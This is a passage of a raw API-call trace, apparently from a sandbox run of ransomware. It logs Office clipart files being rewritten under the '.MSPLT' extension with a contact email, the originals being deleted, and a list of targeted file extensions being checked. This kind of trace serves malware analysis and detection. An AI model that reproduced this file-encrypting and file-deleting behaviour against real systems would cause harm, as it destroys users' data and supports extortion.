lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xc9c, lpOverlapped=0x0) returned 1 [0295.518] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xca0, lpOverlapped=0x0) returned 1 [0295.541] ReadFile (in: hFile=0x3d0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.541] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0295.541] SetEndOfFile (hFile=0x44c) returned 1 [0295.541] CloseHandle (hObject=0x44c) returned 1 [0295.544] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.544] SetEndOfFile (hFile=0x3d0) returned 1 [0295.547] CloseHandle (hObject=0x3d0) returned 1 [0295.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.548] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf")) returned 1 [0295.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.549] lstrlenW (lpString=".doc") returned 4 [0295.549] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.549] lstrlenW (lpString=".docx") returned 5 [0295.549] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.549] lstrlenW (lpString=".pdf") returned 4 [0295.549] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.549] lstrlenW (lpString=".xls") returned 4 [0295.549] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.549] lstrlenW (lpString=".xlsx") returned 5 [0295.549] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.549] lstrlenW (lpString=".ppt") returned 4 [0295.549] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.549] lstrlenW (lpString=".zip") returned 4 [0295.549] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.549] lstrlenW (lpString=".rar") returned 4 [0295.549] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.549] lstrlenW (lpString=".bz2") returned 4 [0295.549] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.549] lstrlenW (lpString=".7z") returned 3 [0295.550] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.550] lstrlenW (lpString=".dbf") returned 4 [0295.550] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.550] lstrlenW (lpString=".1cd") returned 4 [0295.550] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.550] lstrlenW (lpString=".jpg") returned 4 [0295.550] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.550] lstrlenW (lpString=".doc") returned 4 [0295.550] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.550] lstrlenW (lpString=".docx") returned 5 [0295.550] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.550] lstrlenW (lpString=".pdf") returned 4 [0295.550] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.550] lstrlenW (lpString=".xls") returned 4 [0295.550] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.550] lstrlenW (lpString=".xlsx") returned 5 [0295.550] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.550] lstrlenW (lpString=".ppt") returned 4 [0295.550] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.550] lstrlenW (lpString=".zip") returned 4 [0295.550] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.550] lstrlenW (lpString=".rar") returned 4 [0295.551] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.551] lstrlenW (lpString=".bz2") returned 4 [0295.551] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.551] lstrlenW (lpString=".7z") returned 3 [0295.551] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.551] lstrlenW (lpString=".dbf") returned 4 [0295.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.551] lstrlenW (lpString=".1cd") returned 4 [0295.551] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0295.551] lstrlenW (lpString=".jpg") returned 4 [0295.551] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.551] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.551] lstrlenW (lpString="BD00155_.WMF") returned 12 [0295.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.552] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=11636) returned 1 [0295.552] CloseHandle (hObject=0x3d0) returned 1 [0295.552] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf")) returned 0x220 [0295.552] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.553] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.553] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0295.556] GetLastError () returned 0x0 [0295.556] ReadFile (in: hFile=0x3d0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x2d74, lpOverlapped=0x0) returned 1 [0295.558] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x2d80, lpOverlapped=0x0) returned 1 [0295.560] ReadFile (in: hFile=0x3d0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.560] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0295.560] SetEndOfFile (hFile=0x44c) returned 1 [0295.561] CloseHandle (hObject=0x44c) returned 1 [0295.562] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.562] SetEndOfFile (hFile=0x3d0) returned 1 [0295.565] CloseHandle (hObject=0x3d0) returned 1 [0295.565] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.566] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf")) returned 1 [0295.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.566] lstrlenW (lpString=".doc") returned 4 [0295.566] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.566] lstrlenW (lpString=".docx") returned 5 [0295.566] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.566] lstrlenW (lpString=".pdf") returned 4 [0295.566] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.567] lstrlenW (lpString=".xls") returned 4 [0295.567] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.567] lstrlenW (lpString=".xlsx") returned 5 [0295.567] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.567] lstrlenW (lpString=".ppt") returned 4 [0295.567] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.567] lstrlenW (lpString=".zip") returned 4 [0295.567] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.567] lstrlenW (lpString=".rar") returned 4 [0295.567] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.567] lstrlenW (lpString=".bz2") returned 4 [0295.567] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.567] lstrlenW (lpString=".7z") returned 3 [0295.567] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.567] lstrlenW (lpString=".dbf") returned 4 [0295.567] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.567] lstrlenW (lpString=".1cd") returned 4 [0295.567] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.567] lstrlenW (lpString=".jpg") returned 4 [0295.567] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.567] lstrlenW (lpString=".doc") returned 4 [0295.567] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.567] lstrlenW (lpString=".docx") returned 5 [0295.567] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.567] lstrlenW (lpString=".pdf") returned 4 [0295.567] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.568] lstrlenW (lpString=".xls") returned 4 [0295.568] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.568] lstrlenW (lpString=".xlsx") returned 5 [0295.568] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.568] lstrlenW (lpString=".ppt") returned 4 [0295.568] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.568] lstrlenW (lpString=".zip") returned 4 [0295.568] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.568] lstrlenW (lpString=".rar") returned 4 [0295.568] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.568] lstrlenW (lpString=".bz2") returned 4 [0295.568] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.568] lstrlenW (lpString=".7z") returned 3 [0295.568] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.568] lstrlenW (lpString=".dbf") returned 4 [0295.568] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.568] lstrlenW (lpString=".1cd") returned 4 [0295.568] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0295.568] lstrlenW (lpString=".jpg") returned 4 [0295.568] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.568] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.568] lstrlenW (lpString="BD00160_.WMF") returned 12 [0295.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.569] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=22516) returned 1 [0295.569] CloseHandle (hObject=0x3d0) returned 1 [0295.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf")) returned 0x220 [0295.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.570] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.570] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0295.571] GetLastError () returned 0x0 [0295.571] ReadFile (in: hFile=0x3d0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x57f4, lpOverlapped=0x0) returned 1 [0295.957] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x5800, lpOverlapped=0x0) returned 1 [0295.959] ReadFile (in: hFile=0x3d0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.959] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0295.959] SetEndOfFile (hFile=0x44c) returned 1 [0295.959] CloseHandle (hObject=0x44c) returned 1 [0295.965] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.965] SetEndOfFile (hFile=0x3d0) returned 1 [0295.969] CloseHandle (hObject=0x3d0) returned 1 [0295.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0297.110] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf")) returned 1 [0297.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.111] lstrlenW (lpString=".doc") returned 4 [0297.111] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.111] lstrlenW (lpString=".docx") returned 5 [0297.111] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.111] lstrlenW (lpString=".pdf") returned 4 [0297.111] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.111] lstrlenW (lpString=".xls") returned 4 [0297.111] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.111] lstrlenW (lpString=".xlsx") returned 5 [0297.111] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.111] lstrlenW (lpString=".ppt") returned 4 [0297.111] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.111] lstrlenW (lpString=".zip") returned 4 [0297.111] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.111] lstrlenW (lpString=".rar") returned 4 [0297.111] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.112] lstrlenW (lpString=".bz2") returned 4 [0297.112] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.112] lstrlenW (lpString=".7z") returned 3 [0297.112] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.112] lstrlenW (lpString=".dbf") returned 4 [0297.112] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.112] lstrlenW (lpString=".1cd") returned 4 [0297.112] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.112] lstrlenW (lpString=".jpg") returned 4 [0297.112] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.112] lstrlenW (lpString=".doc") returned 4 [0297.112] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.112] lstrlenW (lpString=".docx") returned 5 [0297.112] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.112] lstrlenW (lpString=".pdf") returned 4 [0297.112] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.112] lstrlenW (lpString=".xls") returned 4 [0297.112] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.112] lstrlenW (lpString=".xlsx") returned 5 [0297.112] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.112] lstrlenW (lpString=".ppt") returned 4 [0297.113] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.113] lstrlenW (lpString=".zip") returned 4 [0297.113] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.113] lstrlenW (lpString=".rar") returned 4 [0297.113] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.113] lstrlenW (lpString=".bz2") returned 4 [0297.113] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.113] lstrlenW (lpString=".7z") returned 3 [0297.113] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.113] lstrlenW (lpString=".dbf") returned 4 [0297.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.113] lstrlenW (lpString=".1cd") returned 4 [0297.113] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0297.113] lstrlenW (lpString=".jpg") returned 4 [0297.113] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.113] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0297.113] lstrlenW (lpString="BD09031_.WMF") returned 12 [0297.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0297.136] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=47786) returned 1 [0297.136] CloseHandle (hObject=0x480) returned 1 [0297.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf")) returned 0x220 [0297.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0297.137] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.137] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0297.138] GetLastError () returned 0x0 [0297.138] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xbaaa, lpOverlapped=0x0) returned 1 [0297.143] WriteFile (in: hFile=0x4c0, lpBuffer=0x3b99020*, 